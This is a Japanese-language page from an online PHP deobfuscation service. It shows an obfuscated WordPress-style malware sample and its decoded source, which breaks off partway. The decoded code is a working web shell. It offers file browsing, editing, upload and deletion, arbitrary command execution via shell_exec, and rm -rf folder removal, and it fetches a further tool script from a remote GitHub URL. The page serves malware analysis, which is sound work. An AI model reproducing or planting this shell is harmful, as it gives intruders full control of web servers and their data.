Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41"; $Lix = "\x3d4\x417X0oykriWj2N\x41VKr1Z4D\x41/H8m/LK2\x42rT6twom\x61qp1fJkQ2OokgXF2m/ehjo\x63riV5D3x5J8XTEf\x420PW87R\x42qPX/gRJk9UiJk2X...



難読化されたPHPコード

<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41"; $Lix = "\x3d4\x417X0oykriWj2N\x41VKr1Z4D\x41/H8m/LK2\x42rT6twom\x61qp1fJkQ2OokgXF2m/ehjo\x63riV5D3x5J8XTEf\x420PW87R\x42qPX/gRJk9UiJk2XwXyMnq6D\x61lZ\x63vYt\x61xv\x62JzTg2YGWZlwj\x61k1mnlwmvRsfYYOW1pFQSnNwK6OtJIyWjOkMi9H51KGYM22QjR\x2bDsn4\x62ukM6DQQghqm\x61et9P\x61Y18UL\x42\x62ktggvS\x43W3q8wf0O9LK/QfHWY\x42\x2bWNnpUWrR5Qe5\x2bii\x61\x61kTPihPUeZSw\x62KG\x2bKXzxH28n/\x63\x42fLx\x2b/iyv8x/mH56Gg03HuFeInsinTWOHy1rO0tr0K04\x41O2eR\x43meqgXn8uY6mu\x41gLn2F\x42ZG/Hp\x61\x6346vpdO\x2bYqniH6635dPSd7863p\x62\x63yRUvNu\x2bZ\x613jmZlSDvQg3g201Hm/E1TR68EYq\x2bh\x2bw\x61\x41OG\x63LzDWY6YzDT5RKyj81izE9If1j\x426QjsoqT\x634\x41l0QNQoS0\x43j5hrM\x61Q4jLxwGv\x42uGP\x41\x61xnYUj3g0jF\x41v4RMux\x62I74\x43M\x62fzoSvZ8GgOe\x41yiHxkGvhrHDg\x627\x62Mr4\x62MR2NPr\x614s8JFyW\x41FZGkK\x2buGI\x42oF9qHO6Re/4jvJu\x61G1S/vI\x63E0yxz\x41em1jKhQxttXvY\x437SimWDHW6NGur/V/43LQ\x411mS1VPO6Hw\x43\x63pmdzhz/v/\x2bGX\x43ssMf\x2b99\x62zP6HwKY9Y\x61v9\x43g6uUGP\x2by\x62ffDEP/kpTfO/2qjeG7iMV/joRov9Kw7DKt35FF0qf3t3vu42\x62w36d\x62wpPf\x633sNXev7lRvYWQv\x2b4Yf99/zu\x614tVYxHsO7Zh5jG\x4318IuigQLsJ/hN7\x417Sg\x4279ZMqd7\x411ldzs\x62eTVSO\x61MElMSGOp\x41/\x61RDeHOX07\x621lTnve\x2bs6oU\x2bVR4zN8SweWd9\x433ZqX3JeOgtPkyp\x61\x63\x43PYznFeqKj\x419JMn2DtmV4YM0j0zNWKEhKX46lYGxHKZryZmMSy5mLPyWltDgsLqF\x2bZ\x63pFwgNGqZ\x63t62rywRzvXQkQD3fT/iUDp\x42W35\x42\x63kInf7kZuGE\x43Wq\x6182OSpQFD5ey\x2bx\x419m5qghnwKiM0jjuZxUpFRm83FtRHpUgtl\x61ZOdu\x2b\x625d\x421HPzw6x86QOLsjP5nM\x63/EsfOL1xwD3tqF\x43OUMlJN9xI\x63d\x41FDxDn\x2bQy/MXQo9gRxI\x42IUq9G/\x2b\x2bnZ//jk/h\x42nn575iFdekj\x41wQQKYsRH9wg\x2bxxIPfm69PRUK\x42I\x63ki2\x62s\x43dNS\x425YIo1R2\x631\x439Foy\x42tHodE/PX1g1\x2bSX3HFXwgQu41UUTJjh1Iq84yyVFkj\x61\x61DltFkh\x42\x63M9wh25usR1\x2bVdLME7jdIUg88tS6Q5DmJMr5QpVVr6XPoNWqehK\x43DFgUkQ0PiuTJ0YD\x63d1yV1QV\x62FIZlJ7VoUUhSpronvuzU\x42WW\x63KUZL1fmQ9WkQ12zR1FXH9L/\x42r6MFseejFqmxFSd\x61OKYlThXrUnW9ru2TekXe\x43P\x42y\x63\x431ZoN3rYNiN6\x42\x42\x63z/eVf4TO\x63SVfdl\x41M\x42D9QPIQuEKXuNO\x61F8XR1x8\x41rHeRRoizrH/rZsivKrItpQv6JL\x41VRneTddsXp8/JHw\x2bNHJZ6toW9KWkf\x2b24ZP\x2b6j\x624rnN04Q\x2b5t74iLNI39\x63zY/pJ\x41H\x63r7\x2bWOS/4dutwi46gzv39W8he3rv5\x62\x63MV/\x62vq\x62\x632\x4335uL\x63unu4N462H\x61326eD\x62i3\x2bq\x62\x433h/I1lo\x41n\x43v\x43Eh8oWR\x2bUGQgz\x2b\x2bL\x61KMg\x43HlJL\x63hOvKw\x6357JzOfH\x63m\x42LS5d\x2b5/lZyK9\x61DYhm1s6xLl\x42mY6U\x62zRKmuRnfVRs4fo8mQ3OO9vWS3MXrFLK\x61sI6DfhMvJM1ONWRhM1dM\x2bUEjNH\x62\x637ZG/\x626j\x2bq\x41\x62M\x63IEjrdRz\x42tJIq4wrwrjL3rmnEHd4H61jI7nkoOQL\x42TX3DgzWZKdUPs0QmY\x436iqg9gX\x42Xd1MZ1065r2Mh\x62ji\x2b9\x41Y9rROJlGpux\x42s5OVM72rHXp1\x41VjT1oE/tXEW2d\x63qZoqnzghur\x2bM\x43\x61wD\x4309U\x418ROYq\x42qne1FPZmtuQ4DnyiOV5hIpHwotK\x63EdFK\x43f\x61H5oImW6Ldqf6qTfJKjS2RvOOjw\x63pY\x62oigV\x41HZguDZSoH\x41Vse8Gs6zWOSxqNMWHGUiz8gT\x41hWzlmn0ItWd\x41\x42\x63v/7HgjosUyoUI61R\x41s/\x638f\x42QFm/OJQ4grD5FKjr\x42i4lQZq7ESn\x43fYwPyjPfWierqj1\x619JUw\x42\x61NXNjjo8sINUDIT1dwuOYR\x2b\x43L\x6327i45wtX4fkxxh\x62wuDZ7zp\x41f\x61K\x41s0QddsO4O4\x43\x61GV7928\x42R1rUFQUZr1rTsK\x62kMm9TZ9otnUh\x41svnSqNK3Lzp\x42yU\x61tSzUIfKNtgDfLrw55i\x43\x42MU\x62ms3oO\x42zHkjrKpKN\x416\x63K/JjGGp\x61pNI4M8X\x435Rt2Kv\x427NL\x63\x2by1GOyq1K\x41yfyP4483oEirO3yEPKOt5j\x41L50J0oY5Slq4NSkWR\x43uxrngqSMU\x2b/sE\x42o1kn\x62g\x61k9VRZeqGmsGieJYy57Dyux3JHtSsz250Wx1PN95r\x62g\x620Z\x43DXQse2jzm\x62\x41\x41M\x62VU\x422QrpX\x41qj\x63jU6\x43\x62EFmNF7Hq\x42ul\x2b0EOt3Gnngkd9Jjzkut\x42noYDv9DQfOld2xdwKnqgGe6tj\x61RdQmZQMtZpPpqDioI1zyg\x2byI1\x42ysP\x63\x43VF/fE\x62QZ\x62WW15Vk\x42fekZw\x639V1WzJ\x2bmyeW0s\x43ZFmoo/pj/\x61l\x4335rkzdrFmVDdTNM\x62/z\x61OLNvJVZ7\x61FLVs\x41\x62/YoN5RsutiIZOtkR2QLQuv7HrXlWG/lQr/0G/tJ82hs1lwJLpdTHh/\x431TFxLUGmV1Ls\x2beEX\x62Ti\x43k\x414yPr\x61\x42oU\x63dFYIN\x62\x43n8QqtgUEPm\x62\x62KFyUq7wjgW\x62MgURnG\x43FrpqMGDJLtegEpi2sZrw\x61X01Mei\x41\x6118VwRLwRWU\x2bP\x41NkIh\x41yF5Q6rip6MQNrR3kxmUPVXzYUmRODE\x2bUFDWfTteKDK9jp2YTSTJ8\x63L1Kph1XoIWqh\x42jFG1yjqIX9/\x42H8W8T0\x2bGXmF7ilHNdqMd8g\x43X2\x43PVZnl\x2bui\x43dT\x43dYJ2I096dSt4K\x43p8WsWW9xpy\x61XU2i/\x61gQ5TTS\x41\x61syS3FoIId/kxnsrQQsG\x618QE0K4\x2b5\x43IPHHw\x2bJS7z6lnN3UGyZfvIEmpKSQ\x41l6uY\x2b4iJ5Soi1Tysi\x62WFdpEivW6x\x42p\x2boyp6w\x42kO0NpHIjymiNi\x62xDQeFrFVVeFGH70Qo\x41Ng5\x62UIygVZJ19\x62mQloPQn\x6367ZZEF8\x62\x42ogHk6Mzpifx0s6HYQ\x62\x2boP342/QhvfZ\x41pPjsi6Ojr5jeoZi\x63DZmkQk\x420\x2br\x43wi\x43XjZG6\x2bZgMkT\x42yhTm9xM9mxJzME\x628uGWL\x61/\x62\x2b\x61MODDf\x425E\x42IZi\x2bL7JvSQMvxFuiG4OQNSJ4rdf\x63\x42MEsI\x42Ow4E\x63E8KiwejOfgXZ0\x43n\x62\x63\x414I\x62U4\x63\x41NrI2RLvS9\x63j8yxtkDgqoW\x437rWmdltigdSM\x42Fv\x42r2XN5HYyHPMpYJ\x63FIdlKww6\x41poo5tkdIkKjX\x61S91RikEl4eq37L\x2b2KzWGhQySPpt\x63rs0IVoEozoL4Y\x63K/u3JRQUz1nvGViUV6S/sMpS\x63f23ZTLQ\x63eDN\x63znzQ8TsFQR\x43KTzlzDzgSJvKYI\x63MjIT06LZU3gnJyQ0LSiE\x41hO\x43qlKH2\x62zVl5sLg\x42WQO9yw\x42\x61DOUI6\x61UIOrDUIm9oJIZQ7\x2bNRX45nw\x62yfjwdXy0ympgRijN0DTE7PyDnu\x616O8NeI55ZQL1HTWlMRm7WhswX/p\x2bM0\x41Qk\x2b43KnvqWXH/s\x42YyPvSiOY\x42YH8\x62J4\x63uhW3zjX\x2buTwdLErKH\x41/\x63/j\x61KOHL\x62yRxNEVQFp3oYUfgX\x42rHF9SYlN7I\x42YwG6Vu\x41mFwRPJ2jjkyRU7LW\x41VVtNyW\x62\x43JNt\x42TG\x61M\x432LjhEzXxr\x42gMoytTPZeIQiq\x2bOdIVY\x434mIGp6\x41P4XkdnkDW20drtUl56HPgjZ\x41Mu3G\x62\x43\x2bFeQMjDnPlNxDY/w\x43s\x42\x2bNQdvPmMyKJPGri0g0Qyyv/mHPHsG4S\x63gf\x2buX67Fp2n\x41ZnT9m\x42\x62fXLfg3L9vSnn1\x43\x429OqG3/H\x2b1/drnh\x62Mj\x63ztje3F8SZ\x61mIDMF3dUz0DQ5\x61mLuyPmg7\x43pxYfgD\x61U4xL69nXIl9x\x63Zki5\x639TGdMxhpS4v\x41LLD4f\x61hG8p\x42Pk\x62G60jPdPXqRNwKWNX\x61\x42M8N9ITHZQEQKDkWmqQWD\x41v\x431JR4g\x42KGupdkSzwWlU/4jP\x42JtfGNEJX8KX8EVwuSN0U64lugIYrOo1\x61j/qy\x63N8w6Snn4mL\x42GJTPRudFz4hpj0MVzi\x63\x419mfOdEn8p2Qp57thUK\x43mJmwKyOjy9ky5Yg0Oeij\x2bzjW\x42hG\x2bpZRxuNTWptEhRZj\x2b\x42h1nIpegzTRidSTd/jjheZDzqGjF\x2b8FVO8X9\x62VuMz\x42RwO8Nri3gPZs\x62zQ8NzPfMS7EHxMnw9Seh\x2bi\x2bNyufU7JWhZ\x2b\x62\x63MP2fUo2ufVqYwyklOuX\x2b2yjw8i\x43zUGl\x43YVK3L\x2bJI3\x61dIPsFu\x61ZQGDd5KfwozOhu2wPk2fKmsJrif3niKzfP\x2b5hH\x2b\x61\x62O7w\x2b\x63Eh\x42OFtWfuYpVPY0vF5mTG7hHFVJZ\x43PHODr/vYzpV\x61956\x42e\x41WEXd4tPGTY\x618vwiMs\x2bhxm4kX\x437L1ytP\x41W2ejn5\x42xWx3vF6hHZ\x61EEUih8GZyssyNrt\x41hjfJo9k2G\x62pwfyS5seH\x42R/\x2b\x2bwXexxndyJ8TdwKGRxTVO8EDj\x2bIwZ\x62EkppNlD\x63J0eEzpfTwkWn\x41NzH5ksNQsYDKYepj74dK3ihX5d8oUYwpGwGGGYiT\x2bkXn4EG0x4\x419i5nwR\x61E/t\x2b/fTeG01M\x43MLvELY9\x42oIE/zK\x63rUUIRgg\x42J\x2bw37/2mELZkEl1YxnsDd0j\x62x00xS\x63n6dP\x62kJuUH5zO1lNRzq5U\x2bgDQ/xdz7LvN\x62P3\x61\x630s890gw\x42wJeyLTDNHg8t0g0\x42wJeyLSDdHg8d0g4\x42wJeyLRDtHg8N0g8\x42wJe"; eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto)))); exit; ?>

デコード(難読化解除)されたコード

<?php

$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUPHJrNBEAtYA";
$Lix = "=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";
eval {
    ?><html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="N4ST4R_ID">
  <meta name="robots" content="noindex, nofollow" />
  <title>Na}{tarrr</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
  <link rel="stylesheet" href="https://naxtarrr.netlify.app/assets/css/shell_style.css">
</head>
<body>
  <?php 
    error_reporting(0);
    $tools = base64_encode(file_get_contents("https://raw.githubusercontent.com/nastar-id/kegabutan/master/shelk.php"));
    echo "<div class='container'><div id='pw'>Home: <a href='?path=" . getcwd() . "'>" . getcwd() . "</a></div><br>";
    ?>
  <form method="GET">
    <input type="text" name="path" autocomplete="off" style="width:280px" class="textinput" required>
    <input type="submit" value="Go!!" class="submit">
  </form>

  <?php 
    if (htmlspecialchars(isset($_GET["path"]))) {
        $path = $_GET["path"];
        $file = $_GET["file"];
        $folder = $_GET["folder"];
        $folder_name = basename($folder);
        $file_name = basename($file);
        ?>
    <script>
      const path = document.querySelector('input[name=path]')
      path.value = '<?php 
        echo $_GET["path"];
        ?>'
    </script>
    <br>
    <center>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=createfolder"><button type="button" class="button-tools">Create Folder</button></a>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=createfile"><button type="button" class="button-tools">Create File</button></a>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=spawntools"><button type="button" class="button-tools">Spawn ToolKit</button></a>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=info"><button type="button" class="button-tools">Info Min</button></a>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=upload"><button type="button" class="button-tools">Upload File</button></a>
      <a href="?path=<?php 
        echo htmlspecialchars($_GET["path"]);
        ?>&action=cmd"><button type="button" class="button-tools">Command</button></a>
    </center><br><br>

    <?php 
        if ($_GET["action"] == "view") {
            echo "<p class='text-center'>Filename: {$file_name}</p><br>";
            echo "<textarea class='textarea' disabled>" . htmlspecialchars(file_get_contents($file)) . "</textarea>";
        } elseif ($_GET["action"] == "edit" && $file) {
            ?>
        <form method="POST">
          <p class="text-center">
            Filename: <?php 
            echo $file_name;
            ?>
          </p>
          <br>
          <?php 
            echo "<textarea name='content' class='textarea'>" . htmlspecialchars(file_get_contents($file)) . " </textarea>";
            ?>
          <center><input type="submit" name="edit" value="Edit" class="submit"></center>
        </form>
        <?php 
            if (isset($_POST["edit"])) {
                $editted = base64_encode($_POST["content"]);
                $save = saveme($file, base64_decode($editted));
                if ($save) {
                    echo "<script>alert('Edit {$file_name} success')</script>";
                    echo "<script>window.location = '?path={$path}&action=edit&file={$file}'</script>";
                } else {
                    echo "Edit {$file_name} failed";
                }
            }
        } elseif ($_GET["action"] == "rename" && $file) {
            renames($file, $path, $file_name);
        } elseif ($_GET["action"] == "rename" && $folder) {
            renames($folder, $path, $folder_name);
        } elseif ($_GET["action"] == "delete" && $file) {
            if (unlink($file)) {
                echo "<script>alert('Delete {$file_name} success')</script>";
                echo "<script>window.location = '?path={$path}'</script>";
            } else {
                echo "Delete {$file_name} failed";
            }
        } elseif ($_GET["action"] == "delete" && $folder) {
            if (is_dir($folder)) {
                if (is_writable($folder)) {
                    @rmdir($folder);
                    @shell_exec("rm -rf {$folder}");
                    @shell_exec("rmdir /s /q {$folder}");
                    echo "<script>alert('{$folder_name} Deleted')</script>";
                    echo "<script>window.location = '?path={$path}'</script>";
                } else {
                    echo "Delete {$folder_name} failed";
                }
            }
        } elseif ($_GET["action"] == "spawntools") {
            $save = saveme($path . "/tools.php", base64_decode($tools));
            echo "<center>";
            if ($save) {
                echo "<script>alert('Spawn Toolkit tools.php success')</script>";
                echo "<script>window.location = '?path={$path}'</script>";
            } else {
                echo "Spawn Toolkit failed";
            }
            echo "</center>";
        } elseif ($_GET["action"] == "createfile") {
            ?>
        <br>
        <form method="POST">
          <center>
            <input type="text" name="filename" placeholder="Filename" class="textinput">
            <textarea name="filetext" class="textarea"></textarea>
            <input type="submit" name="touch" value="Create" class="submit">
          </center>
        </form>
        <?php 
            if (isset($_POST["touch"])) {
                $filename = $_POST["filename"];
                $filetext = base64_encode($_POST["filetext"]);
                $save = saveme($path . "/" . $filename, base64_decode($filetext));
                if ($save) {
                    echo "<script>alert('" . $filename . " has successfully created')</script>";
                    echo "<script>window.location = '?path=" . htmlspecialchars($path) . "'</script>";
                } else {
                    echo "Create file failed";
                }
            }
        } elseif ($_GET["action"] == "createfolder") {
            ?>
        <form method="POST">
          <center>
            <input type="text" name="foldername" placeholder="Folder name" autocomplete="off" class="inputtext textinput">
            <input type="submit" name="cfolder" value="Create" class="submit">
          </center>
        </form>
        <?php 
            if (isset($_POST["cfolder"])) {
                $fname = $_POST["foldername"];
                if (@mkdir($path . "/" . $fname)) {
                    echo "<script>alert('{$fname} Created')</script>";
                    echo "<script>window.location = '?path=" . htmlspecialchars($path) . "'</script>";
                } else {
                    echo "Create folder failed";
                }
            }
        } elseif ($_GET["action"] == "upload") {
            ?>
        <form method="POST" enctype="multipart/form-data">
          <center>
            <label for="naxx" class="button-tools">Choose File Here</label>
            <input type="file" name="nax_file" id="naxx">
            <input type="submit" name="upkan" value="Upload" class="submit">
          </center><br>
        </form>
        <?php 
            if (isset($_POST["upkan"])) {
                if (move_uploaded_file($_FILES["nax_file"]["tmp_name"], $path . "/" . $_FILES["nax_file"]["name"])) {
                    $file = $_FILES["nax_file"]["name"];
                    echo "<script>alert('{$file} uploaded')</script>";
                    echo "<script>window.location = '?path=" . htmlspecialchars($path) . "'</script>";
                } else {
                    echo "<center>Upload fail</center>";
                }
            } else {
                echo "<center>No file selected</center>";
            }
        } elseif ($_GET["action"] == "cmd") {
            ?>
        <form method="POST">
          <center>
            <input type="text" name="cmd" placeholder="Command" autocomplete="off" class="inputtext textinput">
            <input type="submit" name="exec" value="Execute" class="submit">
          </center>
        </form>
        <?php 
            if (isset($_POST["exec"])) {
                $cmd = $_POST["cmd"];
                echo "<div class='cmd'>" . @shell_exec($cmd) . "</div>";
            }
        } elseif ($_GET["action"] == "info") {
            echo '<div class="wrap">';
            infomin();
            echo '</div>';
        } else {
            ?>
          <div class="wrap">
            <table>
              <thead>
                <tr>
                  <th>Items</th>
                  <th>Size</th>
                  <th>Permission</th>
                  <th>Action</th>
                </tr>
              </thead>
              <tbody>
                <?php 
            $scan = scandir($path);
            foreach ($scan as $folders) {
                if (!is_dir($path . "/" . $folders) || $folders == ".." || $folders == ".") {
                    continue;
                }
                ?>
                  <tr>
                    <td nowrap="nowrap" width="450"><?php 
                echo "<a href='?path={$path}/{$folders}'><i class='fas fa-folder'></i> {$folders}</a>";
                ?></td>
                    <td nowrap="nowrap" width="100"><center>---</center></td>
                    <td nowrap="nowrap" width="150">
                      <center>
                        <?php 
                if (is_writable($path . "/" . $folders)) {
                    $color = "lime";
                } else {
                    $color = "red";
                }
                echo "<font color='{$color}'>" . hi_permission($path . "/" . $folders) . "</font>";
                ?>
                      </center>
                    </td>
                    <td nowrap="nowrap" width="90">
                      <center><?php 
                echo "\r\n            <a href='?path={$path}&action=rename&folder={$path}/{$folders}'><i class='fas fa-pen'></i></a>\r\n            <a href='?path={$path}&action=delete&folder={$path}/{$folders}'><i class='fas fa-trash-alt'></i></a>\r\n            ";
                ?></center>
                    </td>
                  </tr>
                  <?php 
            }
            foreach ($scan as $files) {
                if (is_file($path . "/" . $files)) {
                    ?>
                    <tr>
                      <td nowrap="nowrap" width="450"><?php 
                    echo "<a href='?path={$path}&action=view&file={$path}/{$files}'><i class='fas fa-file'></i> {$files}</a>";
                    ?></td>
                      <td nowrap="nowrap" width="100"><?php 
